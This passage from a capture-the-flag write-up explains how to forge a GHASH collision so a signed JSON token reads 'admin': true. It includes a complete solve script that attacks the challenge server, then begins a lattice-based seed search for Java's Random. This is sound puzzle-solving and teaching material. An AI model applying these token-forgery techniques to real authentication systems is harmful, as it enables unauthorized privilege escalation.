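The two-block collision can be checked without Sage. The following is a minimal pure-Python sketch, assuming the bit ordering and reduction constant of the GCM specification; the names `gf_mul`, `ghash` and `ONE` are hypothetical helpers, and `h` is an arbitrary stand-in value, not the challenge's actual hash subkey.

```python
R = 0xE1 << 120   # reduction constant for GCM's GF(2^128)
ONE = 1 << 127    # the field element 1 (GCM puts the x^0 coefficient in the top bit)


def gf_mul(x, y):
    """Multiply two 128-bit blocks (as integers) in GCM's GF(2^128)."""
    z, v = 0, y
    for i in range(128):
        if (x >> (127 - i)) & 1:   # bit i of x, counted from the most significant bit
            z ^= v
        v = (v >> 1) ^ R if v & 1 else v >> 1   # v <- v * x, reduced
    return z


def ghash(h, blocks):
    """Horner evaluation of sum(X_i * H^(n+1-i)); addition is XOR."""
    y = 0
    for x in blocks:
        y = gf_mul(y ^ x, h)
    return y


# Stand-in values (assumptions for illustration only).
h = 0x0123456789ABCDEF0FEDCBA987654321
x1 = int.from_bytes(b"first block 0001", "big")
x2 = int.from_bytes(b"second block 002", "big")

x1_new = x1 ^ ONE   # X1' = X1 + 1
x2_new = x2 ^ h     # X2' = X2 + H

assert (x1, x2) != (x1_new, x2_new)
assert ghash(h, [x1, x2]) == ghash(h, [x1_new, x2_new])
```

The same cancellation works for any difference $D$ in place of 1, as long as the second block is shifted by $D \cdot H$.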

However, our desired collision is more complex, requiring specific characters and a valid JSON. The token, after padding, can be divided into five blocks:

[b'{"token": "b3ea9', b'0a7b48bc6464fa63', b'xxxxxxxxxxx", "a', b'dmin": false}\x00\x00\x00', b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xe8']

We need to control blocks[3] == b'dmin": true }\x00\x00\x00' and adjust the other blocks to maintain the same hash.
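To make the block layout concrete, here is a small sketch that reproduces the padding from the pycryptodome snippet above and splits a token into 16-byte blocks. The token value and the filler bytes in `forged` are made up for illustration; only the layout matters.

```python
import json


def pad(nonce):
    """Pad a nonce the way pycryptodome does before feeding it to GHASH."""
    fill = (16 - len(nonce) % 16) % 16 + 8
    return nonce + b"\x00" * fill + (8 * len(nonce)).to_bytes(8, "big")


def to_blocks(data, size=16):
    return [data[i:i + size] for i in range(0, len(data), size)]


# Hypothetical token with the same shape as the challenge's (61 bytes).
token = json.dumps(
    {"token": "00112233445566778899aabbccddeeff", "admin": False}
).encode()
blocks = to_blocks(pad(token))
for i, block in enumerate(blocks):
    print(i, block)

# A forged token with the same length: blocks[0] and the length block stay
# untouched, blocks[1] is free, blocks[2] ends with '","a', blocks[3] is fixed.
forged = b'{"token": "00112' + b"A" * 16 + b"B" * 12 + b'","a' + b'dmin": true }'
forged_blocks = to_blocks(pad(forged))

assert len(forged) == len(token) == 61
assert forged_blocks[0] == blocks[0] and forged_blocks[4] == blocks[4]
assert forged_blocks[3] == b'dmin": true }\x00\x00\x00'
assert json.loads(forged)["admin"] is True
```

Because the length stays at 61 bytes, the final length block is identical in both messages and drops out of the collision equation.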

$$X_1 H^5 + X_2 H^4 + X_3 H^3 + X_4 H^2 + X_5 H^1 = T$$

Adjusting blocks[3] means changing $X_4$ to $X_4 + C$, so other $X$ values need adjustments to maintain equality. Assume the adjustments to $X_2$ and $X_3$ are $A$ and $B$, then:

$$A H^4 + B H^3 + C H^2 = 0 \rightarrow C = A H^2 + BH$$

Any adjustments $A,B,C$ satisfying the above equation will give the same hash. However, we need adjustments that result in ACCEPTABLE characters and legal JSON.

My approach was to notice that blocks[2] has to end with a piece of JSON syntax, while blocks[1] lies entirely inside the token string and can be changed freely. So, I generated blocks[2] == b'xxxxxxxxxxxx","a' with random ACCEPTABLE characters in place of the x's. This gives $B$. Then calculate $A=\frac{C-BH}{H^2}$, convert $X_2+A$ back to bytes, and check whether all characters are ACCEPTABLE. If not, try again with a new random blocks[2].

from Crypto.Cipher import AES
from Crypto.Util.number import *
from sage.all import GF, PolynomialRing
import json
import os
import string
import random

ACCEPTABLE = (string.ascii_letters + string.digits + string.punctuation + " ").encode()


class GoodHash:
    def __init__(self, v=b""):
        self.key = b"goodhashGOODHASH"
        self.buf = v

    def update(self, v):
        self.buf += v

    def digest(self):
        cipher = AES.new(self.key, AES.MODE_GCM, nonce=self.buf)
        enc, tag = cipher.encrypt_and_digest(b"\0" * 32)
        return enc + tag

    def hexdigest(self):
        return self.digest().hex()


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


subkey = AES.new(b"goodhashGOODHASH", AES.MODE_ECB).encrypt(b"\0" * 16)


# GF(2^128) utility functions are copied and modified from https://github.com/bozhu/AES-GCM-Python/blob/master/test_gf_mul.sage

x = PolynomialRing(GF(2), "x").gen()
F = GF(2 ** 128, "a", x ** 128 + x ** 7 + x ** 2 + x + 1)
a = F.gen()


def int2ele(integer):
    res = 0
    for i in range(128):
        # rightmost bit is x127
        res += (integer & 1) * (a ** (127 - i))
        integer >>= 1
    return res


def bytes2ele(b):
    return int2ele(bytes_to_long(b))


def ele2int(element):
    integer = element.integer_representation()
    res = 0
    for _ in range(128):
        res = (res << 1) + (integer & 1)
        integer >>= 1
    return res


def ele2bytes(ele):
    return long_to_bytes(ele2int(ele), 16)


def ghash(H, XS):
    # H: ele
    # XS: ele[]
    Y = int2ele(0)
    for X in XS:
        Y = (Y + X) * H
    return Y


def pad(b: bytes):
    fill = (16 - (len(b) % 16)) % 16 + 8
    ghash_in = b + b"\x00" * fill + long_to_bytes(8 * len(b), 8)
    return ghash_in


def to_blocks(b: bytes, sz=16):
    return [b[i : i + sz] for i in range(0, len(b), sz)]


def find_collision(token, max_attempt=2 ** 14):
    H = bytes2ele(subkey)
    blocks = to_blocks(pad(token))
    assert len(blocks) == 5
    C = bytes2ele(b'dmin": true }\x00\x00\x00') + bytes2ele(blocks[3])
    new_blocks = list(blocks)
    new_blocks[3] = ele2bytes(bytes2ele(new_blocks[3]) + C)
    ele2 = bytes2ele(new_blocks[2])
    ele1 = bytes2ele(new_blocks[1])
    H2 = H * H
    for _ in range(max_attempt):
        B = bytes2ele(bytes(random.sample(ACCEPTABLE, 12)) + b'","a') - ele2
        A = (C - B * H) / H2
        bA = ele2bytes(ele1 + A)
        if all(x in ACCEPTABLE for x in bA):
            break
    else:
        return
    assert A * H ** 2 + B * H == C
    new_blocks[1] = ele2bytes(bytes2ele(new_blocks[1]) + A)
    new_blocks[2] = ele2bytes(bytes2ele(new_blocks[2]) + B)
    fake_token = b"".join(new_blocks)[:-2].strip(b"\0")
    assert GoodHash(fake_token).digest() == GoodHash(token).digest()
    return fake_token


def main():
    from pwn import remote, context

    context.log_level = "error"

    while True:
        # io = process(["python", "main.py"])
        io = remote("good-hash.chal.perfect.blue", 1337)
        io.recvuntil(b"Body: ")
        token = io.recvline().strip()
        io.recvuntil(b"Hash: ")
        hexhash = io.recvlineS().strip()
        assert GoodHash(token).hexdigest() == hexhash
        fake = find_collision(token)
        if fake:
            print(fake)
            print(json.loads(fake))
            io.sendline(fake)
            print(io.recvallS())
            break
        print("next")
        io.close()


main()

# run this script in 8 tmux windows, then sit down and pray one of them can find the correct one in a short time...
# pbctf{GHASH_is_short_for_GoodHash_:joy:}

This very brute-force random algorithm has a low success rate, but it's sufficient for obtaining the flag. For each token, I tried up to $2^{12}$ times, and if it failed, I reconnected to get a new token. Running this script in 8 tmux panes simultaneously took about 5 minutes to get the flag.

Seed Me

import java.nio.file.Files;
import java.nio.file.Path;
import java.io.IOException;
import java.util.Random;
import java.util.Scanner;

class Main {

    private static void printFlag() {
        try {
            System.out.println(Files.readString(Path.of("flag.txt")));
        }
        catch(IOException e) {
            System.out.println("Flag file is missing, please contact admins");
        }
    }

    public static void main(String[] args) {
        int unlucky = 03777;
        int success = 0;
        int correct = 16;

        System.out.println("Welcome to the 'Lucky Crystal Game'!");
        System.out.println("Please provide a lucky seed:");
        Scanner scr = new Scanner(System.in);
        long seed = scr.nextLong();
        Random rng = new Random(seed);

        for(int i=0; i<correct; i++) {
            /* Throw away the unlucky numbers */
            for(int j=0; j<unlucky; j++) {
                rng.nextFloat();
            }

            /* Do you feel lucky? */
            if (rng.nextFloat() >= (7.331f*.1337f)) {
                success++;
            }
        }

        if (success == correct) {
            printFlag();
        }
        else {
            System.out.println("Unlucky!");
        }
    }
}

This problem requires finding a seed for Java 17's Random such that, 16 times in a row, after 2047 outputs are thrown away the next nextFloat() is at least 7.331 * 0.1337 ~= 0.98.

First, information about Java 17's Random can be found here. It is a simple LCG with the formula s = (s * 0x5DEECE66D + 0xb) % (2 ** 48). The nextFloat method is implemented as next(24) / ((float)(1 << 24)).
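As a rough illustration of the description above, the following Python sketch emulates the generator and replays the game loop for a candidate seed. The names `JavaRandom` and `count_lucky` are hypothetical. The constructor's XOR with the multiplier is how java.util.Random scrambles the user-supplied seed, and the threshold is evaluated in double precision here, which only approximates Java's float product.

```python
MULT = 0x5DEECE66D
ADD = 0xB
MASK = (1 << 48) - 1


class JavaRandom:
    """Minimal emulation of java.util.Random's 48-bit LCG."""

    def __init__(self, seed):
        # java.util.Random scrambles the seed before using it as the state.
        self.state = (seed ^ MULT) & MASK

    def next(self, bits):
        """Advance the state and return its top `bits` bits (unsigned)."""
        self.state = (self.state * MULT + ADD) & MASK
        return self.state >> (48 - bits)

    def next_float(self):
        return self.next(24) / (1 << 24)


def count_lucky(seed, rounds=16, unlucky=0o3777):
    """Replay the challenge loop and count how many checks succeed."""
    rng = JavaRandom(seed)
    threshold = 7.331 * 0.1337  # approximation of the float constant
    success = 0
    for _ in range(rounds):
        for _ in range(unlucky):
            rng.next_float()
        if rng.next_float() >= threshold:
            success += 1
    return success


print(count_lucky(0))
```

A seed solves the challenge when `count_lucky(seed)` returns 16, so this can serve as a quick offline check before submitting a candidate.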

To achieve this goal, the state behind each of the 16 checked outputs needs to be very close to $m=2^{48}$.

Since this is an LCG, the 16 outputs can be written as:

$$\begin{aligned} v_1 &\equiv a_1 s + b_1 \pmod{m} \\ v_2 &\equiv a_2 s + b_2 \pmod{m} \\ &\vdots \\ v_{16} &\equiv a_{16} s + b_{16} \pmod{m} \end{aligned}$$
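The coefficients can be obtained by composing the LCG step with itself. The sketch below is one way to do it, assuming $s$ denotes the internal state (the user-supplied seed XORed with the multiplier) and that the $i$-th checked output comes from the state after $2048 i$ steps (2047 discarded outputs plus the checked one). The names `compose` and `jump_coefficients` are hypothetical.

```python
MULT = 0x5DEECE66D
ADD = 0xB
M = 1 << 48
STEP = 0o3777 + 1  # 2047 discarded outputs plus the one that is checked


def compose(a1, b1, a2, b2):
    """Coefficients of applying x -> a1*x + b1 first, then x -> a2*x + b2."""
    return (a1 * a2) % M, (a2 * b1 + b2) % M


def jump_coefficients(n):
    """Return (a, b) such that the state after n steps is a*s + b (mod M)."""
    a, b = 1, 0
    for _ in range(n):
        a, b = compose(a, b, MULT, ADD)
    return a, b


# (a_i, b_i) for i = 1..16, built by repeating one 2048-step jump.
a_step, b_step = jump_coefficients(STEP)
coeffs = []
a, b = 1, 0
for _ in range(16):
    a, b = compose(a, b, a_step, b_step)
    coeffs.append((a, b))

# Sanity check against naive stepping from an arbitrary internal state.
s = 123456789
state = s
for _ in range(STEP * 3):
    state = (state * MULT + ADD) % M
a3, b3 = coeffs[2]
assert (a3 * s + b3) % M == state
```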

The goal is to make $v_i$ as close to $m$ as possible, meaning $m-v_i > 0$ should be small, so $v_i < m$ but very close to $m$. Using this and rewriting the modulo part, we get:

$$\begin{aligned} a_1 s - k_1 m &= v_1 - b_1 \\ a_2 s - k_2 m &= v_2 - b_2 \\ & \vdots\\ a_{16} s - k_{16} m &= v_{16} - b_{16} \end{aligned}$$

From here, we can write the lattice basis $B$:

$$B= \begin{bmatrix} 1 & a_1 & a_2 & \cdots & a_{16} \\ & m \\ & & m \\ & & & \ddots \\ & & & & m \end{bmatrix}$$

Setting $v=(s,-k_1,\cdots,-k_{16})$, we have $vB=(s,v_1-b_1,\cdots,v_{16}-b_{16})$.

I used Inequality Solving with CVP. You provide the upper and lower bounds for $vB$, and